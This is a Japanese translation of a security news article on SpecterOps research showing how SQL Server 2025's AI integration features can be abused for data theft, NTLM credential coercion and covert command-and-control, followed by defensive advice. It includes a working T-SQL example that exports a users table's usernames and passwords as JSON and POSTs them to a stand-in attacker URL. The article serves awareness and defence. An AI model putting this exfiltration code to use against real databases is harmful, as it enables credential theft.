新たなセキュリティ分析により、Microsoft SQL Server 2025のネイティブAI機能が攻撃者によって悪用され、機密データの密かな窃取やデータベースエンジン内でのコマンド&コントロール(C2)チャネルの確立に利用される可能性があることが明らかになりました。これにより、侵害後の攻撃対象領域が大幅に拡大する恐れがあります。
SpecterOpsのセキュリティ研究者であるJustin Kalnasy氏は、検索拡張生成(RAG)などの現代的なデータワークフローをサポートすることを目的として新たに導入されたAI機能が、従来の検出機構を回避するために悪用できることを実証しました。
対象となる機能には、ストアドプロシージャの sp_invoke_external_rest_endpoint、 CREATE EXTERNAL MODEL 関数、および AI_GENERATE_EMBEDDINGSが含まれており、これらはいずれもSQL ServerがHTTPS経由で外部サービスと通信できるようにするものです。
SQL Server 2025の悪用手法
最も深刻な問題は、 sp_invoke_external_rest_endpoint 機能にあります。この機能を使用すると、データベースインスタンスは最大100MBのペイロードを含む任意のHTTPリクエストを外部エンドポイントへ送信することができます。
本来はAPIインテグレーション向けに設計された機能ですが、実質的には攻撃者にとってデータ窃取のための内蔵チャネルとなり得ます。
攻撃者がsysadminなどの高権限アクセスを取得した場合、アラートを引き起こしやすいPowerShellや xp_cmdshell といった従来のツールを使用することなく、テーブルやファイル全体を抽出して攻撃者が管理するインフラに送信することができます。
例えば、攻撃者は機密データベースレコードをJSON形式にシリアル化し、HTTPS経由で窃取することができます。
DECLARE @payload NVARCHAR(MAX);
SELECT @payload = (
SELECT username, password
FROM dbo.app_users
FOR JSON AUTO
);
EXEC sp_invoke_external_rest_endpoint
@url = N'https://attacker-server/collect',
@method = 'POST',
@payload = @payload;このアプローチにより、データを分割して大量に窃取することが可能となり、C2フレームワークに通常伴う運用上の障壁や帯域幅の制約を回避できます。
さらに、RESTエンドポイント機能と OPENROWSET を組み合わせることで、ファイルレベルの窃取も実現できます。これにより、攻撃者は基盤となるシステムから機密ファイルを読み取り、外部へ送信することが可能になります。
直接的なデータ窃取にとどまらず、今回の研究ではSQL Server 2025が永続的な窃取プラットフォームへと変容し得ることも明らかにされています。
トリガーを利用することで、攻撃者は新たに挿入または更新されたレコードをリアルタイムでリモートサーバーに自動送信することができます。これにより、繰り返し手動で操作することなく、継続的な認証情報の収集やデータ漏洩が可能になります。
もう一つの注目すべき手法として、 CREATE EXTERNAL MODEL 機能を悪用してSMB経由のNTLM認証を強制的に行わせる攻撃があります。
モデルの場所として悪意あるUNCパスを指定することで、攻撃者はSQL Serverを攻撃者が管理するインフラに対して認証させることができ、企業環境内での認証情報の奪取やリレー攻撃が可能になります。
さらに高度な手法では、これらのAI機能を組み合わせて隠密なC2チャネルを構築します。攻撃者が管理するAPIを指す外部モデルを登録し、 AI_GENERATE_EMBEDDINGS を通信メカニズムとして活用することで、攻撃者は正当なAIエンベディングのトラフィックに偽装しながらコマンドを発行し、その結果を受け取ることができます。
この手法は悪意ある活動を通常のAIワークフローに溶け込ませるものであり、特にデータベースサーバーからのアウトバウンドHTTPSトラフィックが正当とみなされる環境では、検出を著しく困難にします。
こうした機能の導入は、データベースシステムが企業ネットワーク内でどのように動作するかという点において、根本的な変化をもたらすものです。
これまでSQLサーバーからのアウトバウンドトラフィックは不審とみなされてきましたが、AIとの統合によってこの動作が正常なものとして扱われるようになり、従来の検出戦略が機能しにくくなっています。
防御側には、特に権限管理と機能の有効化に関して、SQL Serverのセキュリティベースラインを再評価することが推奨されます。
外部モデルの作成や変更の監視、 xp_cmdshell やCLRアセンブリといった高リスク機能の使用状況の監査、データベースサーバーからのアウトバウンドネットワークアクセスの制限が、重要な緩和策となります。AI機能を活用する組織は、悪用を示す異常を特定するために、想定されるトラフィックパターンのベースラインをあらかじめ確立しておくことも重要です。
今回の研究は、より広範なトレンドを浮き彫りにしています。AIの機能が基幹エンタープライズソフトウェアに組み込まれるにつれ、ステルス的な悪用への新たな経路が生まれています。堅牢な監視と厳格なアクセス制御が整備されていなければ、信頼された環境内で活動する攻撃者にとって、これらの機能が強力な武器となる危険性があります。
翻訳元: https://gbhackers.com/hackers-could-abuse-sql-server-2025/
